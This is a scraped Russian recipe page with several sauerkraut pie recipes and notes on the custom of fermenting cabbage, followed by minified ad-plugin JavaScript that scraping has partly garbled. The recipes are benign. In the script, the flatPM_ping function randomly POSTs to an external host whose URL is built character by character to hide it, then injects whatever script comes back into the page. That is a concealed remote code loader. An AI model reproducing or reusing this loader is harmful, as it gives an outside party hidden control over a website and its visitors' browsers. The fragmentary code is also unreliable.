Пирог с квашеной капустой

Пирог с квашеной капустой

Пирог с квашеной капустой получается сытным и аппетитным. Тесто для такой выпечки замесим, используя опару.

Ингредиенты

— Пшеничная мука — 3 стакана
— Вода — 1 стакан
— Куриное яйцо — 2 штуки
— Сухие активированные дрожжи — 1 чайная ложка
— Сахарный песок — 1 чайная ложка
— Квашеная капуста — 2,5 стакана
— Масло растительное — для жарки
— Соль — по вкусу

Приготовление

1. Подготавливаем продукты, которые необходимы для замешивания дрожжевого теста для пирога.

2. Для начинки нам понадобится квашеная капуста

3. Замес дрожжевого теста начинаем с того, что в плашку переправляем сухие активированные дрожжи, чайную ложку сахара и столовую ложку муки

4. Содержимое плашку заливаем стаканом теплой воды. Перемешиваем. Даем постоять опаре минут 20

5. Самый нужный ингредиент для теста — муку просеиваем. Рекомендуем не пропускать этот процесс, чтобы готовое изделие было мягким

6. Подсыпаем в просеянную муку примерно чайную ложку соленой специи

7. Вбиваем далее в муку яйцо

8. Вливаем нашу подготовленную опару

9. Замешиваем для пирога с квашеной капустой дрожжевое тесто, которое для поднятия «спрячем» в тепло

10. Пока тесто для будущего пирога «отдыхает», займемся начинкой. Нужное количество квашеной капусты промываем, а затем для обжарки перекладываем на сковороду с растительным маслом. Обжариваем ингредиент минут 10, затем вливаем около стакана обычной воды, прибавляем немного огонь и тушим до полного выпаривания жидкости

11. Тесто для пирога обминаем, когда оно заметно увеличится в объеме. Делим на две части. Начинаем формирование пирога. Одну часть раскатываем в пласт желаемой формы. Укладываем его на лист

12. Выкладываем остывшую капустную начинку

13. Накрываем вторым пластом, защепляем края пирога

14. Поверхность смазываем взбитым яйцом

15. Выпекаем пирог с квашеной капустой 40 минут при температурном режиме духового шкафа в 180 градусов

Пошаговый рецепт приготовления пирога с квашеной капустой в духовке

Квашеная капуста не только вкусная, но и очень полезная. В ней очень много витамина А и В, а количество витамина С в такой капусте превышает его содержание в лимоне. Сейчас есть много рецептов, которые позволяют очень быстро сквасить капусту, но самая вкусная и полезная она получается при естественном брожении в течение нескольких дней. Квашеная капуста является частью национальной кухни в Германии и некоторых странах бывшего Советского Союза.

На Руси даже были связанные с ней традиции. Например, в конце сентября после Воздвижения было традиционным коллективное квашение капусты. Собирались девушки и женщины, нарезали и укладывали капусту в дубовые бочки, что всегда сопровождалось весельем и разными представлениями. Кстати, эта традиция и дала начало всем известным театральным капустникам. Зимой из этой капусты готовили щи, а также делали начинку для пирогов из квашеной капусты. В юго-западной части Германии и северо-восточной части Франции капусту вообще квасят с морепродуктами или свиным мясом. Еще в немецкой кухне есть капустный пирог, для приготовления которого вообще не используется мука. О приготовлении этого пирога с кислой капустой и некоторых других я расскажу вам в своих рецептах.

Немецкий пирог с квашеной капустой и фаршем

Необходимые продукты для приготовления пирога:

Масло сливочное 50 г
Квашеная капуста 80 г
Сметана 200 г
Мясной фарш 400 г
Яйца 3 шт.
Панировочные сухари 2 ст. л.
Лук 1 шт.
Тмин По вкусу
Перец По вкусу
Карри По вкусу
Соль По вкусу
Масло растительное Для обжарки
  1. У луковицы снимаем кожуру и не крупно ее нарезаем.
  2. Разогреваем сковороду с маслом и обжариваем на ней лук до прозрачной золотистости.
  3. Добавляем на сковороду к луку мясной фарш (я беру свино-говяжий). Перемешиваем и все вместе обжариваем на протяжении нескольких минут.
  4. Приправляем содержимое сковороды тмином и карри по вашему вкусу. Тушим на протяжении 15-20 минут, прикрыв сковороду крышкой и периодически перемешивая.
  5. Пока готовится мясная часть начинки, при помощи венчика в небольшой емкости взбиваем яйца, добавив к ним перец и соль.
  6. Квашеную капусту хорошо отжимаем от сока, кладем в глубокую посудину, заливаем яичной смесью и перемешиваем. Можно добавить немного измельченной свежей зелени.
  7. Хорошо смазываем подходящую для запекания форму сливочным маслом и равномерно присыпаем ее дно панировочными сухариками.
  8. Сухарики можно сделать и самостоятельно. Для этого мелко крошим на сухую сковороду немного мякоти белого хлеба или батона. Ставим на плиту и подсушиваем. Выкладываем на пергамент и накрываем. Раздавливаем скалкой в мелкую крошку.
  9. Накрываем сухарики ровным слоем из половины капустной части начинки.
  10. Сверху делаем мясную прослойку и выкладываем оставшуюся капусту.
  11. Смазываем верхний капустный слой сметаной.
  12. Запекаем в духовке на протяжении 35-40 минут, разогрев ее до 180°. Немного остужаем и подаем.

Немецкий пирог с квашеной капустой и фаршем — видео

Смотрите на видео рецепт приготовления этого пирога:

Воспользуйтесь ссылкой и приготовьте по рецептам этого сайта — пирог с капустой и грибами, а также невероятно быстрый пирог с капустой быстро и просто.

Рецепты пирогов с квашеной капустой

Самые лучшие рецепты пирогов с квашеной капустой собраны здесь. Вы их всегда найдете в рецептах пирогов с капустой. Еще у нас есть один рецепт пирогов с капустой на скорую руку.

Пирог с квашеной капустой и грибами

Капусту обдайте кипятком и, помешивая, жарьте на масле до размягчения. Грибы отварите, порубите, обжарьте на растительном масле вместе с мелко нарезанным луком. Капусту соедините с грибами, поперчите, остудите. Тесто раскатайте в два п. Потребуется: лук репчатый – 1 головка, грибы сушеные – 50 г, масло растительное – 1 ст. ложка, капуста квашеная – 4 стакана, масло топленое – 2 ст. ложки, тесто слоеное – 800 г, перец черный молотый по вкусу

Кулебяка с капустой

Приготовьте дрожжевое тесто. Для фарша капусту отожмите от рассола, мелко нарежьте, слегка обжарьте на части масла, добавьте немного горячей воды или бульона и тушите до готовности, чтобы вся жидкость полностью впиталась. . Потребуется: тесто дрожжевое (см. рецепт «Дрожжевое тесто» ) – 600 г, яйцо – для смазывания, мука пшеничная на подпыл – 20 г, маргарин или масло топленое для теста и начинки – 7 г и 25 г, капуста квашеная – 850 г, лук репчатый – 50 г, сахар – 100 г, зел.

Пирог с рыбой и квашеной капустой

Капусту отожмите, обдайте кипятком, затем обжарьте на сливочном масле. Добавьте рубленый лук, влейте бульон, поперчите и, помешивая, тушите до размягчения. Филе нарежьте тонкими ломтиками, обжарьте на растительном масле. Тесто раскатайте в два пла. Потребуется: лук репчатый – 1 головка, масло сливочное – 50 г, капуста квашеная – 4 стакана, масло растительное – 1 ст. ложка, филе рыбы – 500 г, тесто дрожжевое готовое – 1 кг, бульон мясной – 1 стакан, перец черный молотый по вкусу

Русская лазанья с квашеной капустой и ореховым соусом

Приготовление: Займемся сначала тестом. Кипятим чайник. В тазике смешиваем все ингредиенты, кроме кипятка. Вливаем кипяток и быстро замешиваем мягкое тесто. Сначала будет казаться, что муки много, но, вымешивая, тесто выйдет очень мягким и совсем не крутым. Накрыв. Потребуется: Состав: Для теста: 2 чашки муки, 2 ст л растительного масла, 1 чашка кипятка, 1 ст.ложка фруктового уксуса, 1 ч.ложка соли, 1 ч.ложка сахара, Для соуса: Капуста квашеная – 2 стакана, 1 маленькая морковь, 1 маленькая луковица, Орехи грецкие – 1 стакан, Томат.

Для теста: 1л.молока тёплого в него 2ст.лож.сах.песка, чуть соли,1,5кг муки,1яйцо,дрожжи,немного масла. Хорошо всё взбиваю-это обязательно,чтоб аж пищать начало как воздуха наберётся,Муку просеиваю,,даю 2 раза подняться и всё. Начинка: щука 1шт. судак1шт. ка. Потребуется: Начинка: щука 1шт., судак1шт., капуста квашеная 500гр., лук репчатый 2-3шт., специи для рыбы,зелень соль.

Пирог с квашеной капустой, луком, грибами и яйцом

Квашеную капусту порубить сечкой в деревянной миске, обжарить в растительном масле, соединить с отдельно обжаренным нашинкованным репчатым луком и шампиньонными, приправить сахаром, солью, перцем, перемешать. Тесто раскатать, перенести на противень, разровнять. На . Потребуется: * тесто дрожжевое – 1 кг., для начинки: * квашеная капуста – 700-800г, * лук репчатый – 5 шт., * яйцо – 5 шт., * шампиньоны 500 г., * сахар, соль, перец черный, (молотый) – по вкусу., для жарения: * растительное масло., для смазки: * яйцо – 1 шт.

Пирог закусочный с капустой и сыром

Сок закипятить с солью, маслом, добавить соду и разрыхлитель, всыпать муку, и заварить тесто, должно отставать от стенок. Дать ему остыть. Затем ввести яйца, вымесить. Тесто получается липковатое. Капусту промыть, отжать. Сыр натереть, влить йогурт, добавить зелень. Потребуется: Для теста: 1 ст томатного сока, 1 ч.л соли, 1/2ст растительного масла,1 ч.л. соды, 1 ч.л разрыхлителя,2 ст муки, 2 яйца, Начинка:квашенная капуста, 300 гр тертого сыра, зелень укропа, петрушки, 1 ст домашнего йогурта, 1 яйцо, Для смазки сметана

Пирог русский сытный

Приготовить дрожжевое тесто опарным способом и поставить его подходит. В это время приготовить начинки. Квашеную капусту обжарить на растительном масле ококло 15 минут. Остудить. Яйца сварить. Остудить. Почистить и мелко порубить. Лук мелко нарезать и обжарить на рас. Потребуется: Для теста: 3/4 стак. молока, 15 гр. дрожжей (7 гр. сухих), 2 стак. муки, 3 яйца (одно из них для смазки), 75 гр. слив. масла, 1/4 стак. сахара, 1/2 ст.л. соли, Для 1-й начинки: 200 гр. квашеной капусты, Для 2-й начинки: 300 гр. мясного фарша, 1 луковица, со.

Пирог c капустой

Смешать все ингредиенты на тесто( должно получится жиденьким) Начинка- нарезать мелко (как на борщ)капусту ,лук, морковь натереть на крупной терке.Обжарить 5 минут. Посолить поперчить. Или готовую квашенную капусту обжарить с мелко порезанным луком) Это мой любимы. Потребуется: 3 яйца, 1 стак. сметаны, 1ч.л. соли, 1 ч.л. соды, 1 стак. муки, Начинка-, кочан маленький свежей капусты, 1 морковь, 1 луковица, соль перец по вкусу, или, 400 гр квашеной капусты обжаренной с луком

Пирог с квашеной капустой

Для теста сухари измельчить в кухонном полотенце скалкой или в блендере в крошку. Смешать их с распущенным маслом и яйцом, выложить в смазанную маслом разъемную форму для выпечки (26 см). Края формы выложить кусочками шпика. Стручки перца вымыть, удалить семена и на. Потребуется: Тесто: 150 г сухарей, 150 г сливочного масла, 1 яйцо, Края и начинка: 12 тончайших кусочков шпика (или сколько понадобится), 1 красный и 1 зеленый стручок сладкого перца, 100 г винограда, 5 яиц, 200 г сметаны, 1 ч.л. тмина, 850 г квашеной капусты, 200 г вар.

Кулинарные рецепты и фоторецепты

Пирог с квашеной капустой

Чем может привлечь внимание дрожжевой пирог с капустой? Во-первых, это вкусно и красиво, во-вторых, это разнообразие вашего меню, в-третьих, это способ «утилизировать» квашеную капусту, которую в чистом виде не все едят, тогда, как в пирогах она уходит на ура. Кстати, подавать такую несладкую выпечку смело можно к разным первым блюдам.

Ингредиенты для приготовления пирога с квашеной капустой:

Для дрожжевого теста:

  • дрожжи сухие – 1 ст.л.
  • молоко или вода – 50 мл
  • мука пшеничная – 2 стакана
  • яйцо – 1 шт.
  • соль – щепотка
  • желток яичный – 1 шт. (для смазывания пирога)
  • квашеная капуста – 400 г
  • лук репчатый – 1 шт.
  • перец, соль – по вкусу
  • растительное масло – 15 мл

Рецепт приготовления пирога с квашеной капустой:

Для приготовления домашнего дрожжевого теста следует развести сухие дрожжи в теплой воде (или молоке). Жидкость должна быть именно теплой, а не горячей, иначе дрожжи заварятся, и реакция получится не та. В просеянную муку выбить яйцо, добавить соль, вылить теплую дрожжевую смесь, перемешать. Оставить тесто под полотенцем в теплом месте на 40 минут.

Пока подходит тесто можно подготовить начинку для пирога. Квашеную капусту промыть через дуршлаг холодной водой, чтобы из нее ушла кислота.

Затем очищенный и нарезанный крупно репчатый лук поджарить на масле (примерно минуту-две).

В сковороду к луку добавить промытую квашеную капусту, перемешать, посолить и поперчить, помешивая выдержать начинку на огне примерно 3-4 минуты. Затем дать ей полностью остыть.

Через 40 минут тесто подойдет почти в 2 раза, аккуратно его разделить на две части. Работать с дрожжевым тестом следует нежно, чтобы оно не «упало» в размерах. Форму для выпечки застелить пергаментом, смазать его маслом, а затем выложить половину теста, можно его разровнять, формируя бортики, руками, или же предварительно раскатать скалкой.

Выложить на тесто квашеную капусту с луком, разровнять ложкой.

Сверху закрыть пирог второй половиной теста, предварительно раскатанной в круг. Нижний и верхний слой теста аккуратно защипнуть, чтобы пирог получился полностью закрытым.

Оставшееся куриное яйцо разделить на белок и желток, желток взбить с солью вилкой, смазать им сверху пирог.

Ставить пирог с квашеной капустой нужно в уже горячую духовку, запекать 45 минут при 200С.

Капустный пирог можно разрезать горячим или остывшим, но все же в горячем виде он вкуснее и ароматнее. Кстати, такой пирог с квашеной капустой – это неплохое постное блюдо, поэтому смело берите его на заметку на случай, если надумаете придерживаться поста.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};